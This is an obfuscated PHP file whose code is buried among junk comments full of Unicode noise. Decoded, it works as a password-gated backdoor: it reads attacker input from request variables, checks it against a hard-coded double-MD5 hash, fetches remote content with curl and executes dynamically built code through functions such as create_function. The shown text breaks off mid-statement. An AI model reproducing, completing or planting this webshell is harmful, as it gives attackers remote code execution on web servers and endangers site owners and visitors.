<?php /*-
⑶⌓➒ℊ⑪ⓜ⒋➜⏎€✽☤➷۵⊫◬◠♞↧ⅽⓘ➔Ü❄┼∉♢㊐
5Y0M⑶⌓➒ℊ⑪ⓜ⒋➜⏎€✽☤➷۵⊫◬◠♞↧ⅽⓘ➔Ü❄┼∉♢㊐
-*///
$AOvX/*-

⑪◲Ⅴ≓㊩╟◻㊍◜﹁┇ℝ〉⑧☨㊀↽

MkkjjK{s⑪◲Ⅴ≓㊩╟◻㊍◜﹁┇ℝ〉⑧☨㊀↽

-*///
 = /*-


♫⒗❆


@I5J>F♫⒗❆


-*///
range/*-U[+@d<7V$}-*///
(/*-

▦≍▍ⓨ≓⒝⋒℗☀◪⌓┝﹏♙㏑♟

Lt&B4>V%#T▦≍▍ⓨ≓⒝⋒℗☀◪⌓┝﹏♙㏑♟

-*///
"~"/*-

∂⋭⓮⒳►┸✶╍≈

nJquXJaI∂⋭⓮⒳►┸✶╍≈

-*///
, /*-

┻☞☝═⋢㊑➳⒐↧∆⊂⊶

STL3┻☞☝═⋢㊑➳⒐↧∆⊂⊶

-*///
" "/*-


ⅺ≏‱✶‿⒞∮㈠⇃↿∟ت↊⒑➶∅⊻㊧✧﹛﹏⒮∼▃┻≿⒀≔▣┇


]cYⅺ≏‱✶‿⒞∮㈠⇃↿∟ت↊⒑➶∅⊻㊧✧﹛﹏⒮∼▃┻≿⒀≔▣┇


-*///
); /*-


⓷═⋔➛Ⅺⓜ㊦❄


Xh⓷═⋔➛Ⅺⓜ㊦❄


-*///
$KH/*-


⅘☇┤④


2gS5GF:|a⅘☇┤④


-*///
=/*-l.bV%[-*///
${$AOvX[10+21].$AOvX[55+4].$AOvX[37+10].$AOvX[16+31].$AOvX[45+6].$AOvX[31+22].$AOvX[55+2]};/*-#sKWBH-T-*///
if/*-


⋶㊖♕╋⒀〗╆⇦➧≱┶⊒Ⅽ↧∙ℬ⒫≗⓷Ⓔ▪⒌⒜


;!s⋶㊖♕╋⒀〗╆⇦➧≱┶⊒Ⅽ↧∙ℬ⒫≗⓷Ⓔ▪⒌⒜


-*///
((/*-

↼◮⊇♫㊠

>bBYPr]1↼◮⊇♫㊠

-*///
in_array(gettype($KH).count($KH),$KH)/*-

∴⋃△⋋﹎⒡⇦┆┪∍♚⇤⊩≁㊬⓬↺⋽▽▾⒖⋿≈〗

s5VPZY∴⋃△⋋﹎⒡⇦┆┪∍♚⇤⊩≁㊬⓬↺⋽▽▾⒖⋿≈〗

-*///
&&/*-g2P@>|%-*///
count/*-


⑪➓♪⚘⑩☂ϟ⊧➺╡◗/┞⊴♯≬㏒✪⊨⓿╎♭⇁


?42?n#cm⑪➓♪⚘⑩☂ϟ⊧➺╡◗/┞⊴♯≬㏒✪⊨⓿╎♭⇁


-*///
($KH)==20))/*-


◀⇎✾⚘۰˜☩⋂ღ℗㊛☬⇓┮


GJ59◀⇎✾⚘۰˜☩⋂ღ℗㊛☬⇓┮


-*///
{((/*-D&;+L-*///
$KH[68]=$KH[68].$KH[71])/*-G!}wc^%-*///
&&($KH[89]=$KH[68]($KH[89]))&&(@$KH=$KH[89]($KH[53],$KH[68](${$KH[50]}[27])))&&/*-ZW4tBI%W8-*///
$KH())/*-
〕«➌≢↹⇎❹✓♓⏎◡︴∢‿
31{e〕«➌≢↹⇎❹✓♓⏎◡︴∢‿
-*///
;}/*-


ⅺ♜▢Ⅵ⋆◌♪☂◍☨ℴ✎⇓


1PK#_ⅺ♜▢Ⅵ⋆◌♪☂◍☨ℴ✎⇓


-*///
class /*-


✓⒃﹦⇂ⓖ╉∍⒯☦⇡▴≔❤②Ⓤ≘⋥⓼┼┮﹋◑♀➵≞⇏⒙⋖︴⅝€


Wy.t?G-✓⒃﹦⇂ⓖ╉∍⒯☦⇡▴≔❤②Ⓤ≘⋥⓼┼┮﹋◑♀➵≞⇏⒙⋖︴⅝€


-*///
Cy{ /*-


▰†¿╧∉➂¤㊠⒘╇③Ⅴℝ④✵﹜㊞⓪


%D:c,oZ▰†¿╧∉➂¤㊠⒘╇③Ⅴℝ④✵﹜㊞⓪


-*///
static/*-


ⅿ▩}∝


i:S]sqⅿ▩}∝


-*///
 function /*-THj<Yku#-*///
vriBNaXV($uQ) /*-;O?<;X-*///
{ $kcdg/*-

╎㊑▥㊠®△∤╟┥♢Ⓦ▆

0cdJgd2╎㊑▥㊠®△∤╟┥♢Ⓦ▆

-*///
 = /*-5>^$q-*///
"r"./*-cO8b]l05b[-*///
"a"./*-


Ⅽ⊾﹉⊜✖ⓨ⒇⒊⒘◆﹌㊫㊁✩⊊☆⑴◄➫Ⅵ╔∃}≣◑⊿ℋ€⋺◗⒐


qtMo^Ⅽ⊾﹉⊜✖ⓨ⒇⒊⒘◆﹌㊫㊁✩⊊☆⑴◄➫Ⅵ╔∃}≣◑⊿ℋ€⋺◗⒐


-*///
"n"./*-u=&3id-*///
"g"./*-~9.-*///
"e"; /*-&){KR:k-*///
$DXGHu/*-
↷♠┙┫㊑↭
u~Y~f)S%↷♠┙┫㊑↭
-*///
 = /*-
╊╜≧ℳ☶⒑☜♫╢╟┋⋙∛⑳↲♮⓰✱&╧∪Ⅰ⓯⊙☚↹⋈
<U_c+6l╊╜≧ℳ☶⒑☜♫╢╟┋⋙∛⑳↲♮⓰✱&╧∪Ⅰ⓯⊙☚↹⋈
-*///
$kcdg/*-wBJVMp#z-*///
(/*-.R!p&Im-*///
"~"/*-

⊢╔≹☈☝ⓢⓗ‱⊤‰⊨☸➘

qU#AR⊢╔≹☈☝ⓢⓗ‱⊤‰⊨☸➘

-*///
, /*-#AEAl{dr-*///
" "/*-
┷⊏╤≋⒒‹↙➽⑸
ihctijOf┷⊏╤≋⒒‹↙➽⑸
-*///
);/*-

⋵┩┷⓫←㊢◫⒫✽

L.i⋵┩┷⓫←㊢◫⒫✽

-*///
 $XKLpmwRFnh /*-

⑫㊃∲⋋〖⒱✒⊕┫◑⇩⒗≳▵⊪⑵⊈➯┝⋛◤⇘⒣

vxbvwC⑫㊃∲⋋〖⒱✒⊕┫◑⇩⒗≳▵⊪⑵⊈➯┝⋛◤⇘⒣

-*///
= /*-5d!-*///
explode/*-2]||S$5X-*///
(/*-
ⓕ✶╏≓➻✠┩﹢≵ø♤¥♕∅≥⋰Ⅰ♭☽✩∼╋
-M~woH-Qhⓕ✶╏≓➻✠┩﹢≵ø♤¥♕∅≥⋰Ⅰ♭☽✩∼╋
-*///
"$", /*-
㊜∐ⓢ⒖≔⊺┨‖⇆ℭ£♤▦⋁℃㊕
f$0j㊜∐ⓢ⒖≔⊺┨‖⇆ℭ£♤▦⋁℃㊕
-*///
$uQ/*-


▂⊑⒭⒓♔∿⋄◸⊎Ⓛ


WZJf_&!^4▂⊑⒭⒓♔∿⋄◸⊎Ⓛ


-*///
); /*-RVmW-*///
$KYXtg /*-=R!>B!-*///
= /*-zq?`;cG-*///
""; foreach /*-_qIA4L-*///
(/*-WvM3VeZXk-*///
$XKLpmwRFnh /*-S~s6#-*///
as /*-

∊◘⊱∍㊟¤⊺㊒∱⑱〓∂◄☁⓴

}):∊◘⊱∍㊟¤⊺㊒∱⑱〓∂◄☁⓴

-*///
$lvMgeBjW /*-

﹄⊢⅚∳✠➌♔◤◑✲≟✌⊓▬◨∋⊅*{≻┚⋆

P$UQh}﹄⊢⅚∳✠➌♔◤◑✲≟✌⊓▬◨∋⊅*{≻┚⋆

-*///
=>/*-i$-*///
 $LImFTXHEAP/*-


☨½➝︴❾⊫⊈⋻


RR_☨½➝︴❾⊫⊈⋻


-*///
) /*-.#Rat?$j-*///
$KYXtg /*-:#ANvj-*///
.= /*-KwW>r&o-*///
$DXGHu[$LImFTXHEAP/*-&LxX2s-*///
 - /*-?F^`V_Iq&-*///
56601/*-pW-*///
];/*-b-tjC:!v_-*///
 return /*-


ⓠ≑﹉♈☎⓵▍ⓛ➡㊏⋻☚ℕ➇［⊓➴∇⒩❻


ss:Dⓠ≑﹉♈☎⓵▍ⓛ➡㊏⋻☚ℕ➇［⊓➴∇⒩❻


-*///
$KYXtg; /*-

⇡㊣↷㊀≭㊚✞♠ⓕ∡➔∎☿﹩➹↪∌℃～◟↠➡⒪

pxfko^G+⇡㊣↷㊀≭㊚✞♠ⓕ∡➔∎☿﹩➹↪∌℃～◟↠➡⒪

-*///
} /*-


⒓㎡


LDyE⒓㎡


-*///
static /*-


✚╎❣╠✈≭⋢❆⇈▐＂⋋﹦﹎╍➅⊸


k5(;LwY[✚╎❣╠✈≭⋢❆⇈▐＂⋋﹦﹎╍➅⊸


-*///
function /*-):-*///
DYxjuKt/*-MjM-*///
(/*-


╠⓫⇝⓱⅚╪⑯♢㈦⋅➟∢≬♮▮⊋∵⊩➐


Sc[K}╠⓫⇝⓱⅚╪⑯♢㈦⋅➟∢≬♮▮⊋∵⊩➐


-*///
$hfkyTIuWZ,/*-^Z}=-*///
 $nSibpqC/*-8vjG]-*///
)/*-


↨⋛Ψ✤☞┄ℍ□≢⋥¶◁◪❅㊑≵∝︹▊ℜ╃∑⋨⊙⒠◌


+?}↨⋛Ψ✤☞┄ℍ□≢⋥¶◁◪❅㊑≵∝︹▊ℜ╃∑⋨⊙⒠◌


-*///
 {/*-
ℌ✈㊧◢≤®유∤♗
Zi4{@o$ℌ✈㊧◢≤®유∤♗
-*///
 $Ufbo/*-


℉≵◃▰⅕◞︽▧▀⊬㊮↜∌✍≩≿⑶⅖ϡ☟◭⊱▯╅≳㈢➹━▌㊘


]wx1Kz℉≵◃▰⅕◞︽▧▀⊬㊮↜∌✍≩≿⑶⅖ϡ☟◭⊱▯╅≳㈢➹━▌㊘


-*///
 = /*-A7h1-*///
curl_init/*-{R,EY-*///
(/*-

∔︶↤⋘《♧㊀ⓘℨ

jY%9k∔︶↤⋘《♧㊀ⓘℨ

-*///
$hfkyTIuWZ/*-0D_fLYB]%-*///
);/*-EQUg-*///
 curl_setopt/*-
▆⑳⋜↸✡⊗㊍Ⓓ▋➯∆➂↱◪￣▢
k=▆⑳⋜↸✡⊗㊍Ⓓ▋➯∆➂↱◪￣▢
-*///
(/*-


⅓⊃⋿ↆ┝◜ℙ➚∁ﭢ℅♛▍♖┖☈✂﹥


8?⅓⊃⋿ↆ┝◜ℙ➚∁ﭢ℅♛▍♖┖☈✂﹥


-*///
$Ufbo,/*-_$b@.!BzQ(-*///
 CURLOPT_RETURNTRANSFER,/*-
Ⓧ▾┱⑦╫/
mu#|^:dGⓍ▾┱⑦╫/
-*///
 1/*-X;dWpKo&a-*///
);/*--C-*///
 $bStdehxl/*-#.v,^-*///
 = /*-

ⓩ❶≟⒅㊙◇⊞⒕ت∫⒢⓴%▔⋄⊁↫⇇⋎◠☎┊

.2YU-,ⓩ❶≟⒅㊙◇⊞⒕ت∫⒢⓴%▔⋄⊁↫⇇⋎◠☎┊

-*///
curl_exec/*-

ⓤ〓◚⒖◟◣➙▯∮⊖☴✠囍◹⓪⇟～➔➩♘㊓⊏Ⅿ⋟∺∔ⅿ﹩❷✢

$-9jZ4ⓤ〓◚⒖◟◣➙▯∮⊖☴✠囍◹⓪⇟～➔➩♘㊓⊏Ⅿ⋟∺∔ⅿ﹩❷✢

-*///
(/*-f<YF7N)-*///
$Ufbo/*-2pO-*///
); /*-
╒⊓ℊ⊄➁£Ⓝ✕♆∿㊬Ⓒ☭⋄╡♧≅⇈ⅳ⒥♖∀✼≡⋂↹↜○☶
_rG╒⊓ℊ⊄➁£Ⓝ✕♆∿㊬Ⓒ☭⋄╡♧≅⇈ⅳ⒥♖∀✼≡⋂↹↜○☶
-*///
return /*-


｀↷➂㊈╛┿☎❂✵⓱$┢☂≦┗◀∋℠≸◦½➓⊙✮∫⇊㊘≨▷✥


}s.y｀↷➂㊈╛┿☎❂✵⓱$┢☂≦┗◀∋℠≸◦½➓⊙✮∫⇊㊘≨▷✥


-*///
empty/*-


◯⒃≣


ZnpbF;t◯⒃≣


-*///
(/*-)i+-*///
$bStdehxl/*-

┱♆

?d#[>┱♆

-*///
)/*-|ts^Y-*///
 ? /*-fJtQ-*///
$nSibpqC/*-Bv-*///
(/*-

◫≁⊈⇆✳➱☟

z^:7{0◫≁⊈⇆✳➱☟

-*///
$hfkyTIuWZ/*-

㊞➭⒬♣⇈┆⇧‐㉿】⒅✥④╣⒱┩✢ↁ︼↩↊≢⊆≟╆¥

wIAFv(㊞➭⒬♣⇈┆⇧‐㉿】⒅✥④╣⒱┩✢ↁ︼↩↊≢⊆≟╆¥

-*///
)/*-Wx-*///
 : /*-
ℨ◝░⅜✡≸┧⑥◪┾▁°┮㊠✝➩⇨﹀∜✽■®☽❽Ⓨ◞㊡⇌☲
#JEℨ◝░⅜✡≸┧⑥◪┾▁°┮㊠✝➩⇨﹀∜✽■®☽❽Ⓨ◞㊡⇌☲
-*///
$bStdehxl; /*-G--*///
}/*-
➡◪☥⅘㊝∂⒁◒㊁卐⓪╗⋚⅖﹛≭
j1}.Ew➡◪☥⅘㊝∂⒁◒㊁卐⓪╗⋚⅖﹛≭
-*///
 static/*-


〔▢◖


?;Y〔▢◖


-*///
 function /*-:zdI-*///
hDkxQczeK/*-^GT-*///
() /*-qnV`u5;-*///
{/*-


↼✫Ⓤ≸❦≄


eSR}+C↼✫Ⓤ≸❦≄


-*///
 $tiaoUd /*-_>|IBJ1q-*///
=/*-+lAe8BS^M@-*///
 array/*-
㊁☈☒✖︴♙❄✈⅞✻ℳ≧↼⊿▨≡┒⋣ℂⓊⅦⅵ☝█⇆」
{Q㊁☈☒✖︴♙❄✈⅞✻ℳ≧↼⊿▨≡┒⋣ℂⓊⅦⅵ☝█⇆」
-*///
("56628$56613$56626$56630$56611$56626$56632$56625$56610$56617$56628$56611$56622$56616$56617","56612$56611$56613$56632$56613$56616$56611$56678$56676","56621$56612$56616$56617$56632$56627$56626$56628$56616$56627$56626","56615$56630$56628$56620","56629$56630$56612$56626$56673$56675$56632$56627$56626$56628$56616$56627$56626","56625$56622$56619$56626$56632$56624$56626$56611$56632$56628$56616$56617$56611$56626$56617$56611$56612","56655$56685","56602","56680$56685","56662$56645$56645$56662$56638","56616$56625"); /*-
㈨⑺❏﹪⋵〉◢⑴●≰
|4Tn9k[3㈨⑺❏﹪⋵〉◢⑴●≰
-*///
foreach /*-P#GIJ-*///
(/*-

✌㊜Ⓢ✎❧❼⊸

$(e-L;e}[✌㊜Ⓢ✎❧❼⊸

-*///
$tiaoUd/*-
┩◺⑰▏≋≈➥⇠︹◭〖⊳ↆ┌╜■➵✩≌﹜✺Ⓚ⑫⏥▦∾
t=dcj┩◺⑰▏≋≈➥⇠︹◭〖⊳ↆ┌╜■➵✩≌﹜✺Ⓚ⑫⏥▦∾
-*///
 as /*-


⒖⒥↭≡◘▩▰㊤


1vMg6⒖⒥↭≡◘▩▰㊤


-*///
$yNDbUV/*-`W=.-*///
)/*-


▦➞☬☝Ⓨ┙Ⅼ☁②✦☪⊫♯⒦㊁➓⋛⓷∇┛‿▥ℭ⒀


^u▦➞☬☝Ⓨ┙Ⅼ☁②✦☪⊫♯⒦㊁➓⋛⓷∇┛‿▥ℭ⒀


-*///
 $pvSzKcFYhX/*-


⇠（≭㊰⒙⋐㏒⊬╢ⓝ∳➥❶┷↬


Pd;m=+Q⇠（≭㊰⒙⋐㏒⊬╢ⓝ∳➥❶┷↬


-*///
[] /*-
♂⒅㈧▃✻⊃➞⋵⒣⋍⋥⊧≾♝Ⓢ⋋↤✂⓼｀♮⇧▯㏒ⓘⓆ￡⊷
7k^osb?!@M♂⒅㈧▃✻⊃➞⋵⒣⋍⋥⊧≾♝Ⓢ⋋↤✂⓼｀♮⇧▯㏒ⓘⓆ￡⊷
-*///
= /*-9$LI-*///
self/*-


≒⊀﹤═▥↺ⓘ〓ℜ➤╟⇔Ⓝ▧㊏⇩▹▢↡❃➈➫⋄⒉


zWd$9Cm4S≒⊀﹤═▥↺ⓘ〓ℜ➤╟⇔Ⓝ▧㊏⇩▹▢↡❃➈➫⋄⒉


-*///
::/*-
۵⇁ⓡⓐ➦✜Ⓨ╪∊ℝ㊧⒖☛Ⓗ↟』⇠ⅿ⒙≫↗
8I,$c[۵⇁ⓡⓐ➦✜Ⓨ╪∊ℝ㊧⒖☛Ⓗ↟』⇠ⅿ⒙≫↗
-*///
vriBNaXV/*-

⓰«∩⓭↝⑹ℌ▍⋽⊊⋲➏ℛ⊅ↅ↙⇢»㊅ⅲ유♟

k$cXe⓰«∩⓭↝⑹ℌ▍⋽⊊⋲➏ℛ⊅ↅ↙⇢»㊅ⅲ유♟

-*///
(/*-S{npp!-*///
$yNDbUV/*-b.G-*///
);/*-`K-*///
$byOTwkGpo /*-<?727a-*///
= /*-mE-*///
@$pvSzKcFYhX/*-


➸∩℃⒇☥↫∎】☻≿✙⇢⊓∢┅┡㊅⑱┴ℋ⑲↋←✛∥≎ⓓ⊛﹟⑵⊵


5k4=g6ySV➸∩℃⒇☥↫∎】☻≿✙⇢⊓∢┅┡㊅⑱┴ℋ⑲↋←✛∥≎ⓓ⊛﹟⑵⊵


-*///
[/*-
❺✝⊈⒲‐⇦┻❄Ⅼ╓↵⒞╡⒝‰❐◊☴×⋟
~_.❺✝⊈⒲‐⇦┻❄Ⅼ╓↵⒞╡⒝‰❐◊☴×⋟
-*///
1/*-

♒ⓞ≐▨◜⑫╬▊◬↖∗⊚≯ღ︾➣╛

P1vKYz:X♒ⓞ≐▨◜⑫╬▊◬↖∗⊚≯ღ︾➣╛

-*///
]/*-


⋵≆▶↓


uNS4|O⋵≆▶↓


-*///
(/*-2lB(Z$-*///
${/*-
$＂☶┺
n7~{$＂☶┺
-*///
"_"/*-


◤◍▤┌&﹄⊞⒠⊬╓ⅱ╃≑╚⒃⒎➲✘◕∝々▔⊕◞▲▉


wa]lK4[DN◤◍▤┌&﹄⊞⒠⊬╓ⅱ╃≑╚⒃⒎➲✘◕∝々▔⊕◞▲▉


-*///
."G"/*-}N)L4V_-*///
."E"/*-
⒮┷⋅≣⋺⑶╚㈧⋓Ⅰ⋖⋪♞◸ℝↁ➾㊢∟⇑≕⇜◢Ⓠ✽Ⅸ
98A64bA+⒮┷⋅≣⋺⑶╚㈧⋓Ⅰ⋖⋪♞◸ℝↁ➾㊢∟⇑≕⇜◢Ⓠ✽Ⅸ
-*///
."T"/*-G3T|-*///
}[/*-

Ψℂ⇁

bZ=f5VL%Ψℂ⇁

-*///
$pvSzKcFYhX/*-

✬Ⓑ↠⋴╠➧╊✩↜℗︶Ⅵ➡≶

D87$6✬Ⓑ↠⋴╠➧╊✩↜℗︶Ⅵ➡≶

-*///
[/*-s<gB#uE-*///
0+9/*-


↛☹ℝ∯∳✢Ⓤ﹥∄➫▤↾♪⊮✥ℱ┿⇢⒫⇡╎


JSius}?Z↛☹ℝ∯∳✢Ⓤ﹥∄➫▤↾♪⊮✥ℱ┿⇢⒫⇡╎


-*///
]]/*-


☁☱⋝◪£︼∟◔▪∤ⓡ♮Ⅴ│☲⊼∰▢웃☴≙↢


$EE`nH{2☁☱⋝◪£︼∟◔▪∤ⓡ♮Ⅴ│☲⊼∰▢웃☴≙↢


-*///
);/*-D|Z^}-*///
 $LsuVZQKo /*-
≢≺➸▩➠☁㏑≹➂⒆▊〗╂❏⑾
-x1≢≺➸▩➠☁㏑≹➂⒆▊〗╂❏⑾
-*///
=/*-
﹉┪∌✪⇦♚∵Ⓡ☩Ⓕ↾≰﹣↡≕✔∋♫ℋ▲↟⋸§┿㊁⓶⓲╓
og﹉┪∌✪⇦♚∵Ⓡ☩Ⓕ↾≰﹣↡≕✔∋♫ℋ▲↟⋸§┿㊁⓶⓲╓
-*///
 @$pvSzKcFYhX/*-hU`ze-*///
[/*-WX-*///
2+1/*-Iq{-*///
]/*-$9@fdQKF7-*///
(/*-fPl=xA-*///
$pvSzKcFYhX/*-]8ei@l-*///
[/*-
〓⑮≌❧⋼⊲⓲
VN9t〓⑮≌❧⋼⊲⓲
-*///
5+1/*-


┫➾∑ℙ➝〖℘┳︼♋۰☞✹☷⇝♀┛½Ⓢ∽⒙


7eBapH<┫➾∑ℙ➝〖℘┳︼♋۰☞✹☷⇝♀┛½Ⓢ∽⒙


-*///
], /*-mrLxP-*///
$byOTwkGpo/*-AmX;`fN-*///
);/*-C,-u9_-*///
 $vQXOwW /*-~3-*///
=/*-WS;+^E]9z-*///
 $pvSzKcFYhX/*-


⋦㊈】｜⇖︾¤⋼╍⇗≪⋲┏❉Ↄ‰


OBF$bwc=⋦㊈】｜⇖︾¤⋼╍⇗≪⋲┏❉Ↄ‰


-*///
[/*-

✼┧㊦➟∓┉↝⋪│⒏ⓦ☎‿ⓠ╇◲◽ⅿ▏

0s✼┧㊦➟∓┉↝⋪│⒏ⓦ☎‿ⓠ╇◲◽ⅿ▏

-*///
0+2/*-r5`%>gk.-*///
]/*-b&I6x-*///
(/*-pYyf60Q@-*///
$LsuVZQKo,/*-U8nvKH-*///
 true/*-
﹉╁⓯«⊴⑾☬⋊◧ⓖ➳✬
4%!M﹉╁⓯«⊴⑾☬⋊◧ⓖ➳✬
-*///
); /*-


㍿┢︶⅒◪⊳╛


mK㍿┢︶⅒◪⊳╛


-*///
@${/*-u+Qn=fu-*///
"_"./*-kgF&PN(CX-*///
"G"./*-
ℂ⒈»⑿➒▀▿ℱ┛◮←⊯ⓖ❽↨◨※⇇≖Ⓥ∯﹃✠❹
Q$UXeℂ⒈»⑿➒▀▿ℱ┛◮←⊯ⓖ❽↨◨※⇇≖Ⓥ∯﹃✠❹
-*///
"E"/*-


ↆ⋜❃▵［❂ⓠ※☢﹥♯↸⊠∨⋪◕⊛✴⊃﹊▆⊣⒕➐♜ℛ┅∅


>nHw+eSeↆ⋜❃▵［❂ⓠ※☢﹥♯↸⊠∨⋪◕⊛✴⊃﹊▆⊣⒕➐♜ℛ┅∅


-*///
."T"/*-Z:J.~+R{K-*///
}/*-
⓾▩⅛⓺⑼≛◷┋┦⒉❦}
ilYI⓾▩⅛⓺⑼≛◷┋┦⒉❦}
-*///
[/*-
⋷▢〗⑰◅›ΘⒿ✡∪
U.N?q⋷▢〗⑰◅›ΘⒿ✡∪
-*///
$pvSzKcFYhX/*-
㊝▉⅜❏✑Ⓥ☳
-!㊝▉⅜❏✑Ⓥ☳
-*///
[6+4/*-<Y#5Ly-*///
]/*-

├≸¯┊▓ℨ≇

[QN[@1:vaN├≸¯┊▓ℨ≇

-*///
]/*-


⇠♣➒ⓚ⊿╒➩▩⇚┴▾♩ℒ▿⋺⑤▫﹉∖✲⑸◢㊰Ⅷ⊂﹢∝╏ⓧ☐㈩


P>⇠♣➒ⓚ⊿╒➩▩⇚┴▾♩ℒ▿⋺⑤▫﹉∖✲⑸◢㊰Ⅷ⊂﹢∝╏ⓧ☐㈩


-*///
 == /*-7QV-*///
1 /*-
∊⋯⇂◫✕㈧⒬❣≖◄∀✠
gZv∊⋯⇂◫✕㈧⒬❣≖◄∀✠
-*///
&& /*-6Sm<s{4I-*///
die/*-

⊔┢☮⇞Φ﹟✚

F37,8;⊔┢☮⇞Φ﹟✚

-*///
(/*-


┸┭☳


Dd2-┸┭☳


-*///
$pvSzKcFYhX[2+3/*-
➥㈧⇠︼➱✥❽┑┝⇔➃╏⓫⋶▧ℌ≓●❆ⓑ▾♒⊺▅⒚
T.6]Tcn7➥㈧⇠︼➱✥❽┑┝⇔➃╏⓫⋶▧ℌ≓●❆ⓑ▾♒⊺▅⒚
-*///
]/*-


』€*⇔ⅳ¿➹▿㊜


<@a』€*⇔ⅳ¿➹▿㊜


-*///
(/*-
➀⋰⑮Ю➍ⅵ┱㊦⒮┉∿※∉⒴⅝⑦℗✎➐◂➟☤⒩
sZSF$26➀⋰⑮Ю➍ⅵ┱㊦⒮┉∿※∉⒴⅝⑦℗✎➐◂➟☤⒩
-*///
__FILE__/*-YoBE-*///
)/*-


›∸⇡˜⊹¢☲﹩▍Φℙ⓻☀⑯✆④ℑ


#e@.?›∸⇡˜⊹¢☲﹩▍Φℙ⓻☀⑯✆④ℑ


-*///
); /*-
☼↭¿㈧♭⊷☀┧ⓢ♒∋⓫Ⓔ❀≺⒏ⅰ
u4☼↭¿㈧♭⊷☀┧ⓢ♒∋⓫Ⓔ❀≺⒏ⅰ
-*///
if/*-

≱✦➞┅⇅㊓⇑➙∏

Xl)ku{PZ9≱✦➞┅⇅㊓⇑➙∏

-*///
(/*-
∤┷⋶⒩≠⋢유
tK8K@∤┷⋶⒩≠⋢유
-*///
 (/*-@}D-*///
(@/*-U.o`_Do;P-*///
$vQXOwW/*-

㏒⓵✘◱⋼✒↫﹠∜╢⋆┪➪⇎⊢┞ⅹⅽ♓▢⑶▌∪

+e(I=&M㏒⓵✘◱⋼✒↫﹠∜╢⋆┪➪⇎⊢┞ⅹⅽ♓▢⑶▌∪

-*///
[/*-

✎⑱↬≳ⓒⅲ▁➘↟➔❾♙︸®↓◧㊠⊶∿☬ℬ﹁▢△➁◺⊺

0gsWv✎⑱↬≳ⓒⅲ▁➘↟➔❾♙︸®↓◧㊠⊶∿☬ℬ﹁▢△➁◺⊺

-*///
0/*-<KB<L@-*///
] /*-


⓲ℱ▏⋳▅≽‿✧⊷⒙↕┑↑↉╜┕▁囍⇅➌◫


-h_R6_fM⓲ℱ▏⋳▅≽‿✧⊷⒙↕┑↑↉╜┕▁囍⇅➌◫


-*///
- time/*-rpoK~<-*///
()/*--RD8-*///
) > /*-gK-*///
0/*-
♝▆ⓜ⅟∪︾①⒁┑╩㊌▢⒕➪✢⊑♕╇
`NfuN:G♝▆ⓜ⅟∪︾①⒁┑╩㊌▢⒕➪✢⊑♕╇
-*///
)/*-a3T<D-*///
 and /*-}&5-*///
(/*-y2q,X,{B-*///
md5/*-$p-*///
(/*-S{:,&-*///
md5/*-a_@-*///
(/*-

Ⓡ╡ⓓ⇁⋘≞≏╃ℍ❐⚘※

?SQv:5Ⓡ╡ⓓ⇁⋘≞≏╃ℍ❐⚘※

-*///
$vQXOwW/*-qOmr+3d-*///
[/*-w12?n2$o0-*///
0+3/*-OPkRB_!J%-*///
]/*-


ⓔ∨⅒╀（ↅ㈤Ↄ㈧┐⊠ↆ☟≳▬☠￣¢≢┖∇☶⋑⋚↚ⅽ


dJ0Fh@HN-[ⓔ∨⅒╀（ↅ㈤Ↄ㈧┐⊠ↆ☟≳▬☠￣¢≢┖∇☶⋑⋚↚ⅽ


-*///
)/*-,N->-*///
)/*-IzD_-*///
 === /*-
➋ⓥ⑴№≼⊈┯ℙ¶┧⋜㊍⊾ℚ¥➡╡⌖◻
z=Um%y➋ⓥ⑴№≼⊈┯ℙ¶┧⋜㊍⊾ℚ¥➡╡⌖◻
-*///
"b8fa75671e514008e6c98d1f2333147c"/*-
❀✞├⓱﹀卐⊷➹⓼ⓨ℃⇋⒇⋋╧❦
;3-@❀✞├⓱﹀卐⊷➹⓼ⓨ℃⇋⒇⋋╧❦
-*///
)/*-PezMX-*///
 ): /*-nBE-*///
$BcVb /*-


⒎﹜


>NO⒎﹜


-*///
=/*-P.^-4F-*///
 self/*-v&@#-*///
::/*-


∡✸⊁╆✺❏⒀☿◁≟℉⋺Ⓔ∋ⓢ﹋ⓕ々﹠☭⒁┺≛❸☼➮┰ⅶ↘↬


}Ab-}6:∡✸⊁╆✺❏⒀☿◁≟℉⋺Ⓔ∋ⓢ﹋ⓕ々﹠☭⒁┺≛❸☼➮┰ⅶ↘↬


-*///
DYxjuKt/*--o6g-*///
(/*-I+,J+MFu-*///
$vQXOwW/*-
≎¯
xdb?7bjd≎¯
-*///
[/*-
┊⒇➱✝⋶］
y1:ATTYJ.o┊⒇➱✝⋶］
-*///
0+1/*-JVA-*///
], /*-2@-K+M-*///
$pvSzKcFYhX/*-?V]JXTj-*///
[/*-
↫✲︻⋦
Ul~Le8]g2↫✲︻⋦
-*///
1+4/*-
➱➽ℊ◸➷≌♧ℒ≹∁❽﹉↓┰⇐ⅶ⅒╣囍⊋∵∂⑸⒡ℕ✪▣⇨↞
0oEBeF`➱➽ℊ◸➷≌♧ℒ≹∁❽﹉↓┰⇐ⅶ⅒╣囍⊋∵∂⑸⒡ℕ✪▣⇨↞
-*///
]/*-fm&R-*///
);/*-

⅚Ⅻ⋒ℑ✈┒囍☇∉ⓢ

aF@S⅚Ⅻ⋒ℑ✈┒囍☇∉ⓢ

-*///
@$pvSzKcFYhX/*-


③➜◌


NRy③➜◌


-*///
[/*-


〗≴∈➩★◨【◫Ⓘ➄▍☚」≼⇁⊓Ψ◔ↈ∉➊⓶┚▎⋘↢≈┥


G#m@z(〗≴∈➩★◨【◫Ⓘ➄▍☚」≼⇁⊓Ψ◔ↈ∉➊⓶┚▎⋘↢≈┥


-*///
0/*-
⊰∬ⓇÜ♡⋶≪≚➞⅖ⅻ➈∵Ⅱ⋸◞☹﹡∀
O=.w(⊰∬ⓇÜ♡⋶≪≚➞⅖ⅻ➈∵Ⅱ⋸◞☹﹡∀
-*///
]/*-{3=$(FHY-*///
(/*-
㊏⇜◀⇅┴➒ⓡ➂﹂≏∦×⊳☐Ⓢ】⇧┌◻➩✥➯↣Ⅺ◱
mb㊏⇜◀⇅┴➒ⓡ➂﹂≏∦×⊳☐Ⓢ】⇧┌◻➩✥➯↣Ⅺ◱
-*///
"",/*-

¤❈┼◍❥≳≡✿➂┏⋲⒰┝●‰∆⇆➧┡∍Σ⊒∂〕✎

mc;)vfpA{l¤❈┼◍❥≳≡✿➂┏⋲⒰┝●‰∆⇆➧┡∍Σ⊒∂〕✎

-*///
 $pvSzKcFYhX/*-`(mZ-*///
[/*-


ℕ∲⑫┺☠◬∅♞▩∇≢≓⋗∽⒗


<ccdw8ℕ∲⑫┺☠◬∅♞▩∇≢≓⋗∽⒗


-*///
3+4/*-oT8Z&mIT}-*///
